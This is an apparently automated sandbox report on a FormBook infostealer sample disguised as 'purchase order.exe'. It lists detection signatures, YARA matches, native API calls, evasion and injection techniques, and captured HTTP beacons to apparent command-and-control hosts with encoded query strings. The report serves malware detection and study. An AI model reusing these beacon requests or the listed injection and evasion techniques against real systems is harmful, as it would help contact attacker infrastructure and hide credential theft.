Analysis Report purchase order.exe

Overview

General Information

Sample Name: purchase order.exe
Analysis ID: 323034
MD5: 975187a07455d3cbf38ec878d893b490
SHA1: af8ddbf775cdb9dbd3776f717c192094202127be
SHA256: 009d9a0f6fafa91b750271413fef5771a4ce5855a59c0e6c16c85eb7de08e52b
Tags: exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: purchase order.exe Virustotal: Detection: 28% Perma Link
Source: purchase order.exe ReversingLabs: Detection: 19%
Yara detected FormBook
Source: Yara match File source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: purchase order.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.purchase order.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\purchase order.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 0_2_06A2A760
Source: C:\Users\user\Desktop\purchase order.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 0_2_06A2A755
Source: C:\Users\user\Desktop\purchase order.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 0_2_06A21CEC
Source: C:\Users\user\Desktop\purchase order.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 0_2_06A21CF8

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.6:49750
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /sbmh/?0PJtBJ=kHp9H1tPAFmVsD64lxBGFA2zeARzx9tS7bJBiT/v97zwTY8F+uE1Nk95aq19aJdA0x4qnOoYAg==&jDHXG=aFNTklSp HTTP/1.1Host: www.rettexo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /sbmh/?0PJtBJ=XEJriTYCOuK+SyY/9HWJgPQ+bcG3K3zE43eWtlfOSAWdxw4RjD6D9w7NiRikfKNtMf925IUbyw==&jDHXG=aFNTklSp HTTP/1.1Host: www.makgxoimisitzer.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /sbmh/?0PJtBJ=h/URaQ6chuqxS5rd6TDMT0L901DFCS1Z5y5lZa0zhzexAXZp9SqL0GSPheeJSC1M62VUMIayeg==&jDHXG=aFNTklSp HTTP/1.1Host: www.purehempbotanicalsinfo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 34.102.136.180 34.102.136.180
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GOOGLEUS GOOGLEUS
Source: Joe Sandbox View ASN Name: UNMETEREDCA UNMETEREDCA
Source: Joe Sandbox View ASN Name: TOTAL-SERVER-SOLUTIONSUS TOTAL-SERVER-SOLUTIONSUS
Source: global traffic HTTP traffic detected: GET /sbmh/?0PJtBJ=kHp9H1tPAFmVsD64lxBGFA2zeARzx9tS7bJBiT/v97zwTY8F+uE1Nk95aq19aJdA0x4qnOoYAg==&jDHXG=aFNTklSp HTTP/1.1Host: www.rettexo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /sbmh/?0PJtBJ=XEJriTYCOuK+SyY/9HWJgPQ+bcG3K3zE43eWtlfOSAWdxw4RjD6D9w7NiRikfKNtMf925IUbyw==&jDHXG=aFNTklSp HTTP/1.1Host: www.makgxoimisitzer.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /sbmh/?0PJtBJ=h/URaQ6chuqxS5rd6TDMT0L901DFCS1Z5y5lZa0zhzexAXZp9SqL0GSPheeJSC1M62VUMIayeg==&jDHXG=aFNTklSp HTTP/1.1Host: www.purehempbotanicalsinfo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: g.msn.com
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: purchase order.exe, 00000000.00000002.355213949.0000000002CD1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.357823561.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.379162690.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: purchase order.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_02B1015C NtQueryInformationProcess, 0_2_02B1015C
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_02B10B88 NtQueryInformationProcess, 0_2_02B10B88
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0041A050 NtClose, 2_2_0041A050
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0041A100 NtAllocateVirtualMemory, 2_2_0041A100
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_00419F20 NtCreateFile, 2_2_00419F20
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_00419FD0 NtReadFile, 2_2_00419FD0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_00419FCA NtReadFile, 2_2_00419FCA
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_017E9910
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E99A0 NtCreateSection,LdrInitializeThunk, 2_2_017E99A0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_017E9860
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9840 NtDelayExecution,LdrInitializeThunk, 2_2_017E9840
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E98F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_017E98F0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9A50 NtCreateFile,LdrInitializeThunk, 2_2_017E9A50
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9A20 NtResumeThread,LdrInitializeThunk, 2_2_017E9A20
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_017E9A00
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9540 NtReadFile,LdrInitializeThunk, 2_2_017E9540
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E95D0 NtClose,LdrInitializeThunk, 2_2_017E95D0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9710 NtQueryInformationToken,LdrInitializeThunk, 2_2_017E9710
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E97A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_017E97A0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9780 NtMapViewOfSection,LdrInitializeThunk, 2_2_017E9780
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_017E9660
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E96E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_017E96E0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9950 NtQueueApcThread, 2_2_017E9950
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E99D0 NtCreateProcessEx, 2_2_017E99D0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017EB040 NtSuspendThread, 2_2_017EB040
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9820 NtEnumerateKey, 2_2_017E9820
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E98A0 NtWriteVirtualMemory, 2_2_017E98A0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9B00 NtSetValueKey, 2_2_017E9B00
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017EA3B0 NtGetContextThread, 2_2_017EA3B0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9A10 NtQuerySection, 2_2_017E9A10
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9A80 NtOpenDirectoryObject, 2_2_017E9A80
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9560 NtWriteFile, 2_2_017E9560
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017EAD30 NtSetContextThread, 2_2_017EAD30
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9520 NtWaitForSingleObject, 2_2_017E9520
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E95F0 NtQueryInformationFile, 2_2_017E95F0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017EA770 NtOpenThread, 2_2_017EA770
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9770 NtSetInformationFile, 2_2_017E9770
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9760 NtOpenProcess, 2_2_017E9760
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9730 NtQueryVirtualMemory, 2_2_017E9730
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017EA710 NtOpenProcessToken, 2_2_017EA710
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9FE0 NtCreateMutant, 2_2_017E9FE0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9670 NtQueryInformationProcess, 2_2_017E9670
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9650 NtQueryValueKey, 2_2_017E9650
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E9610 NtEnumerateValueKey, 2_2_017E9610
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E96D0 NtCreateKey, 2_2_017E96D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048995D0 NtClose,LdrInitializeThunk, 5_2_048995D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899540 NtReadFile,LdrInitializeThunk, 5_2_04899540
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048996D0 NtCreateKey,LdrInitializeThunk, 5_2_048996D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048996E0 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_048996E0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899650 NtQueryValueKey,LdrInitializeThunk, 5_2_04899650
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899660 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_04899660
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899780 NtMapViewOfSection,LdrInitializeThunk, 5_2_04899780
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899FE0 NtCreateMutant,LdrInitializeThunk, 5_2_04899FE0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899710 NtQueryInformationToken,LdrInitializeThunk, 5_2_04899710
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899840 NtDelayExecution,LdrInitializeThunk, 5_2_04899840
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899860 NtQuerySystemInformation,LdrInitializeThunk, 5_2_04899860
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048999A0 NtCreateSection,LdrInitializeThunk, 5_2_048999A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899910 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_04899910
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899A50 NtCreateFile,LdrInitializeThunk, 5_2_04899A50
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048995F0 NtQueryInformationFile, 5_2_048995F0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899520 NtWaitForSingleObject, 5_2_04899520
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0489AD30 NtSetContextThread, 5_2_0489AD30
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899560 NtWriteFile, 5_2_04899560
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899610 NtEnumerateValueKey, 5_2_04899610
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899670 NtQueryInformationProcess, 5_2_04899670
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048997A0 NtUnmapViewOfSection, 5_2_048997A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0489A710 NtOpenProcessToken, 5_2_0489A710
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899730 NtQueryVirtualMemory, 5_2_04899730
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899760 NtOpenProcess, 5_2_04899760
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0489A770 NtOpenThread, 5_2_0489A770
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899770 NtSetInformationFile, 5_2_04899770
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048998A0 NtWriteVirtualMemory, 5_2_048998A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048998F0 NtReadVirtualMemory, 5_2_048998F0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899820 NtEnumerateKey, 5_2_04899820
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0489B040 NtSuspendThread, 5_2_0489B040
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048999D0 NtCreateProcessEx, 5_2_048999D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899950 NtQueueApcThread, 5_2_04899950
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899A80 NtOpenDirectoryObject, 5_2_04899A80
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899A00 NtProtectVirtualMemory, 5_2_04899A00
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899A10 NtQuerySection, 5_2_04899A10
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899A20 NtResumeThread, 5_2_04899A20
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0489A3B0 NtGetContextThread, 5_2_0489A3B0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04899B00 NtSetValueKey, 5_2_04899B00
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0063A050 NtClose, 5_2_0063A050
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0063A100 NtAllocateVirtualMemory, 5_2_0063A100
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_00639F20 NtCreateFile, 5_2_00639F20
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_00639FD0 NtReadFile, 5_2_00639FD0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_00639FCA NtReadFile, 5_2_00639FCA
Detected potential crypto function
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_02B10470 0_2_02B10470
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_02B1CB7C 0_2_02B1CB7C
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_02B10940 0_2_02B10940
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_02B17C80 0_2_02B17C80
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_02B10931 0_2_02B10931
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_02B1ACF0 0_2_02B1ACF0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_02B1FBF8 0_2_02B1FBF8
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_02B17C71 0_2_02B17C71
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_02B1DD90 0_2_02B1DD90
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_063ABED8 0_2_063ABED8
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_063A6520 0_2_063A6520
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_063A650F 0_2_063A650F
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_063A0040 0_2_063A0040
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_06A2ACA0 0_2_06A2ACA0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_06A27C90 0_2_06A27C90
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_06A25470 0_2_06A25470
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_06A262A0 0_2_06A262A0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_06A24F20 0_2_06A24F20
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0041D853 2_2_0041D853
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_00401030 2_2_00401030
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0041D38E 2_2_0041D38E
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_00402D88 2_2_00402D88
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_00402D90 2_2_00402D90
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_00409E30 2_2_00409E30
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0041E73A 2_2_0041E73A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_00402FB0 2_2_00402FB0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017C4120 2_2_017C4120
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017AF900 2_2_017AF900
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018720A8 2_2_018720A8
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018728EC 2_2_018728EC
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01861002 2_2_01861002
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0187E824 2_2_0187E824
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D20A0 2_2_017D20A0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017BB090 2_2_017BB090
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0186DBD2 2_2_0186DBD2
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01872B28 2_2_01872B28
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DEBB0 2_2_017DEBB0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018722AE 2_2_018722AE
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A0D20 2_2_017A0D20
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018725DD 2_2_018725DD
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01872D07 2_2_01872D07
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017BD5E0 2_2_017BD5E0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01871D55 2_2_01871D55
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D2581 2_2_017D2581
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B841F 2_2_017B841F
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0186D466 2_2_0186D466
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01871FF1 2_2_01871FF1
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017C6E30 2_2_017C6E30
